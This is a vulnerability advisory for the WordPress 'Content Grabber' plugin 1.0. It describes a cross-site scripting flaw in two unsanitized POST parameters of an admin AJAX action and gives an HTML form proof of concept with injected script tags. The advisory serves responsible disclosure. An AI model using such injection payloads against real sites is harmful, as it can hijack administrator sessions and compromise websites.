WordPress Content Grabber plugin version 1.0 suffers from a cross site scripting vulnerability.
5043885e64ea8ef7c5b2ed1b5d8da75f21aed84c9352a763a9042b9b102dd715
Title: WordPress 'Content Grabber' Plugin
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-14
Download:
- https://wordpress.org/plugins/content-grabber/
- https://plugins.svn.wordpress.org/content-grabber/
Notified WordPress: 2015-06-21
==========================================================
## Plugin description
==========================================================
A plugin to help you grab content of any post type and display them as you want
## Vulnerabilities
==========================================================
Two POST parameters (obj_field_name and obj_field_id) are printed unsanitized when the 'get_terms_taxonomies' action is executed.
PoC:
Log in as admin and submit the following request:
<form method="POST" action="[URL]/wp-admin/admin-ajax.php">
<input type="text" name="action" value="get_terms_taxonomies"><br />
<input type="text" name="post_type" value="post" ><br />
<input type="text" name="obj_field_name" value="widget-cg_content_grabber[3][cat_id]"><script>alert(1)</script>" ><br />
<input type="text" name="obj_field_id" value="widget-cg_content_grabber-3-cat_id"><script>alert(2)</script>" ><br />
<input type="text" name="cat_id_array" value="["1"]" ><br />
<input type="submit">
</form>
## Solution
==========================================================
No fix available
==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.